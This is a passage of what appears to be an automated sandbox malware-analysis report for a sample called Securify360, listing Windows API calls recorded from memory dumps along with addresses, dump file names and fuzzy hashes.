                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 010109F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4046560759-0
                                                                                              • Opcode ID: 3ed3817ddff0c350d8cf58bc23faa7feebf6d8084d0da97fb3635f61482cf1a2
                                                                                              • Instruction ID: 19fc91dbcad704652f9731c784ed8cfbf9135f32401d86fe44f275778530ee61
                                                                                              • Opcode Fuzzy Hash: 3ed3817ddff0c350d8cf58bc23faa7feebf6d8084d0da97fb3635f61482cf1a2
                                                                                              • Instruction Fuzzy Hash: 2E516471208301AFE710EF64C895E6ABBE9BF85310F004919F5C9872A9DB39E945DB92
                                                                                              APIs
                                                                                              • GetMenu.USER32(?), ref: 01015E38
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 01015E6F
                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 01015E97
                                                                                              • GetMenuItemID.USER32(?,?), ref: 01015F06
                                                                                              • GetSubMenu.USER32(?,?), ref: 01015F14
                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 01015F65
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                              • String ID:
                                                                                              • API String ID: 650687236-0
                                                                                              • Opcode ID: a7f4c48fe6859d7d8918c43f5e8cdaaa6188fd32aa1cb11e542e950f9cd86675
                                                                                              • Instruction ID: 689aeb5563ad5491a5177f92ebd84e158ac75514f6fc1d75b36bf83fa95469fe
                                                                                              • Opcode Fuzzy Hash: a7f4c48fe6859d7d8918c43f5e8cdaaa6188fd32aa1cb11e542e950f9cd86675
                                                                                              • Instruction Fuzzy Hash: C251AD35A00219AFDF21EF64CC45AAEB7F5EF89310F104099F951BB355CB38AE418B90
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00FEF6A2
                                                                                              • VariantClear.OLEAUT32(00000013), ref: 00FEF714
                                                                                              • VariantClear.OLEAUT32(00000000), ref: 00FEF76F
                                                                                              • _memmove.LIBCMT ref: 00FEF799
                                                                                              • VariantClear.OLEAUT32(?), ref: 00FEF7E6
                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FEF814
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1101466143-0
                                                                                              • Opcode ID: c7f7abf3501031ccbbb774d5096c9664824496aefaa29aea8ef9c2acbeb2ba56
                                                                                              • Instruction ID: 49458c12875d004a5cb5b6bd7d9e38642bcbc132eb2c116186878a68d8227598
                                                                                              • Opcode Fuzzy Hash: c7f7abf3501031ccbbb774d5096c9664824496aefaa29aea8ef9c2acbeb2ba56
                                                                                              • Instruction Fuzzy Hash: E9516CB5A00209EFDB24CF58C884AAAB7B8FF4C354B15856AE949DB304D735E915CFA0
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FF29FF
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2A4A
                                                                                              • IsMenu.USER32(00000000), ref: 00FF2A6A
                                                                                              • CreatePopupMenu.USER32 ref: 00FF2A9E
                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00FF2AFC
                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FF2B2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3311875123-0
                                                                                              • Opcode ID: 6b115cfe2cc98ab1564354dc59b218bc12a9c3244c4d950149ae4642ad865196
                                                                                              • Instruction ID: f61b3dd5c8d9f610da9e44cfb3494693d985b0b7376a4c567a3891f6f04f80ed
                                                                                              • Opcode Fuzzy Hash: 6b115cfe2cc98ab1564354dc59b218bc12a9c3244c4d950149ae4642ad865196
                                                                                              • Instruction Fuzzy Hash: F751BE70A0030EDFDF65CF68C888BBEBBF4AF84324F104159EA119B2A5D7B49944EB51
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F91B76
                                                                                              • GetWindowRect.USER32(?,?), ref: 00F91BDA
                                                                                              • ScreenToClient.USER32(?,?), ref: 00F91BF7
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F91C08
                                                                                              • EndPaint.USER32(?,?), ref: 00F91C52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                              • String ID:
                                                                                              • API String ID: 1827037458-0
                                                                                              • Opcode ID: e745307ac16fed0f3aebe2f669120a6900102bf29bcb9341edb9bf38c87f7d5d
                                                                                              • Instruction ID: cf49fcfc2d02362b3e8902bd265715c3dc1bf43621a3db117c3f911b15040165
                                                                                              • Opcode Fuzzy Hash: e745307ac16fed0f3aebe2f669120a6900102bf29bcb9341edb9bf38c87f7d5d
                                                                                              • Instruction Fuzzy Hash: C441E231544302AFEB21DF24C885FBA7BE8FB99360F240568F995862A5C7369804EB61
                                                                                              APIs
                                                                                              • ShowWindow.USER32(010577B0,00000000,014A52E0,?,?,010577B0,?,0101BC1A,?,?), ref: 0101BD84
                                                                                              • EnableWindow.USER32(?,00000000), ref: 0101BDA8
                                                                                              • ShowWindow.USER32(010577B0,00000000,014A52E0,?,?,010577B0,?,0101BC1A,?,?), ref: 0101BE08
                                                                                              • ShowWindow.USER32(?,00000004,?,0101BC1A,?,?), ref: 0101BE1A
                                                                                              • EnableWindow.USER32(?,00000001), ref: 0101BE3E
                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0101BE61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: 7ce567e3d06eba2234953316b37b6bf01faece3de6d598b2cd5c7de0e7ed65bb
                                                                                              • Instruction ID: 4b0f5ffe83add930bf0f1268c4089df8d99d9f537357faa7cd1a524833d386c9
                                                                                              • Opcode Fuzzy Hash: 7ce567e3d06eba2234953316b37b6bf01faece3de6d598b2cd5c7de0e7ed65bb
                                                                                              • Instruction Fuzzy Hash: 64416334600144AFDB66DF28C489B947FF1FF09314F6841E9FA888F2AAC735A845CB51
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,0100550C,?,?,00000000,00000001), ref: 01007796
                                                                                                • Part of subcall function 0100406C: GetWindowRect.USER32(?,?), ref: 0100407F
                                                                                              • GetDesktopWindow.USER32 ref: 010077C0
                                                                                              • GetWindowRect.USER32(00000000), ref: 010077C7
                                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 010077F9
                                                                                                • Part of subcall function 00FF57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5877
                                                                                              • GetCursorPos.USER32(?), ref: 01007825
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01007883
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                              • String ID:
                                                                                              • API String ID: 4137160315-0
                                                                                              • Opcode ID: 31a634a020f604b6d52b5de146c5a74a833568ca3dd7041916bff2282f5c1b5e
                                                                                              • Instruction ID: 8f12d19ae7f88170f9aa452cfc6c2955db8edcf55735ba3b676d1cb66742e252
                                                                                              • Opcode Fuzzy Hash: 31a634a020f604b6d52b5de146c5a74a833568ca3dd7041916bff2282f5c1b5e
                                                                                              • Instruction Fuzzy Hash: 4D31C172504309ABE721DF54C848F9BBBE9FF88714F100919F5D597181CA39EA09CBD2
                                                                                              APIs
                                                                                                • Part of subcall function 00FE8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FE8CDE
                                                                                                • Part of subcall function 00FE8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FE8CE8
                                                                                                • Part of subcall function 00FE8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FE8CF7
                                                                                                • Part of subcall function 00FE8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FE8CFE
                                                                                                • Part of subcall function 00FE8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FE8D14
                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00FE904D), ref: 00FE9482
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FE948E
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00FE9495
                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FE94AE
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00FE904D), ref: 00FE94C2
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00FE94C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                              • String ID:
                                                                                              • API String ID: 3008561057-0
                                                                                              • Opcode ID: ff97aa44bf06131d4ce86cd35413bf78ffbf44dcfdf64289474613edf9226c7e
                                                                                              • Instruction ID: 4ffffa0e708fb7074a9fca511b3c4138af72505be5003279f8b976ae4cd24627
                                                                                              • Opcode Fuzzy Hash: ff97aa44bf06131d4ce86cd35413bf78ffbf44dcfdf64289474613edf9226c7e
                                                                                              • Instruction Fuzzy Hash: B811AF32905604FFDB20DFA5CC49FAEBBA9FB45325F208018F88597254D77A9941EB70
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FE9200
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00FE9207
                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FE9216
                                                                                              • CloseHandle.KERNEL32(00000004), ref: 00FE9221
                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FE9250
                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FE9264
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                              • String ID:
                                                                                              • API String ID: 1413079979-0
                                                                                              • Opcode ID: 86e2400c7cc3d1ec2925be5bdf2021e3833d760c4d6679cb0ed38aba0ed22b91
                                                                                              • Instruction ID: 93f309d7e509b0dfdaa5cb537105c8c69820ece6d9af551eb739c8b1f0f61aca
                                                                                              • Opcode Fuzzy Hash: 86e2400c7cc3d1ec2925be5bdf2021e3833d760c4d6679cb0ed38aba0ed22b91
                                                                                              • Instruction Fuzzy Hash: 6F11597290524EBBDF218F94ED49FDE7BA9EF48314F144065FE04A2164C3BA8D60EB60
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00FEC34E
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FEC35F
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FEC366
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00FEC36E
                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FEC385
                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00FEC397
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: 4259c79670cb541cd11c63e65dc66402f6b52c6b2f711150eb7e579e6fac9f2e
                                                                                              • Instruction ID: bd33705a8c5161e7210117abaca302ff39ed2e86998fe420efaeb293c3d308ae
                                                                                              • Opcode Fuzzy Hash: 4259c79670cb541cd11c63e65dc66402f6b52c6b2f711150eb7e579e6fac9f2e
                                                                                              • Instruction Fuzzy Hash: 06014475E00318BFEF209FA69C49A5EBFB8EB48761F104065FE48A7284D6759D11CFA0
                                                                                              APIs
                                                                                                • Part of subcall function 00F916CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F91729
                                                                                                • Part of subcall function 00F916CF: SelectObject.GDI32(?,00000000), ref: 00F91738
                                                                                                • Part of subcall function 00F916CF: BeginPath.GDI32(?), ref: 00F9174F
                                                                                                • Part of subcall function 00F916CF: SelectObject.GDI32(?,00000000), ref: 00F91778
                                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0101C57C
                                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0101C590
                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0101C59E
                                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0101C5AE
                                                                                              • EndPath.GDI32(00000000), ref: 0101C5BE
                                                                                              • StrokePath.GDI32(00000000), ref: 0101C5CE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                              • String ID:
                                                                                              • API String ID: 43455801-0
                                                                                              • Opcode ID: 933582a3f0a542ee9c5e124eca37db317366bc26d94ca847c5582aae66d67eaf
                                                                                              • Instruction ID: 1aef3e9366de4fb9ffe6e447cae6cdcd3dffcb0f54b2a86ec28610b1f5da9e9f
                                                                                              • Opcode Fuzzy Hash: 933582a3f0a542ee9c5e124eca37db317366bc26d94ca847c5582aae66d67eaf
                                                                                              • Instruction Fuzzy Hash: 59111E7204020DBFEF229F94DC88EEA7FADEB04354F148051FA5856164C7769D95DBA0
                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB07EC
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB07F4
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB07FF
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB080A
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB0812
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB081A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 4278518827-0
                                                                                              • Opcode ID: d6e6fea2ad82854be44a44ec2bffe5c8024418250402887d6f02632b90290142
                                                                                              • Instruction ID: b0ac8cb868ef23b381ae2c110ba93263f5f6d41bdaf42c80a1aa415d1dbf6529
                                                                                              • Opcode Fuzzy Hash: d6e6fea2ad82854be44a44ec2bffe5c8024418250402887d6f02632b90290142
                                                                                              • Instruction Fuzzy Hash: A5016CB09027597DE3108F5A8C85B52FFA8FF59354F10411BE15C47941C7F5A868CBE5
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FF59B4
                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FF59CA
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00FF59D9
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF59E8
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF59F2
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF59F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 839392675-0
                                                                                              • Opcode ID: 4c04cd76dfeadc5e55f34c2a2318f7df8018959d756f0fc695dd545f7230e225
                                                                                              • Instruction ID: dc7c77945e501e9a2e0e69c1d5de06d028a282ec4645fd5f459b5b8f7e4266b1
                                                                                              • Opcode Fuzzy Hash: 4c04cd76dfeadc5e55f34c2a2318f7df8018959d756f0fc695dd545f7230e225
                                                                                              • Instruction Fuzzy Hash: 4FF01D32641258BBE7315E929C0EEEF7A7CEFCAB21F200159FA4591048D7AA1A0187B5
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00FF77FE
                                                                                              • EnterCriticalSection.KERNEL32(?,?,00F9C2B6,?,?), ref: 00FF780F
                                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00F9C2B6,?,?), ref: 00FF781C
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F9C2B6,?,?), ref: 00FF7829
                                                                                                • Part of subcall function 00FF71F0: CloseHandle.KERNEL32(00000000,?,00FF7836,?,00F9C2B6,?,?), ref: 00FF71FA
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF783C
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00F9C2B6,?,?), ref: 00FF7843
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: b06080bcc4453580b25b3fe95ff4a0912ec1e1fca00d65c2f4928477248f8d6e
                                                                                              • Instruction ID: ea58d167cce87be0e97a14efa2db7cc882e89f49dfef04ff9e7a7c7780e32c8b
                                                                                              • Opcode Fuzzy Hash: b06080bcc4453580b25b3fe95ff4a0912ec1e1fca00d65c2f4928477248f8d6e
                                                                                              • Instruction Fuzzy Hash: 39F03A32545312ABD7312F64EC8CAABB729BF4A312B341422F242950A88BBB5805DB60
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FE9555
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00FE9561
                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE956A
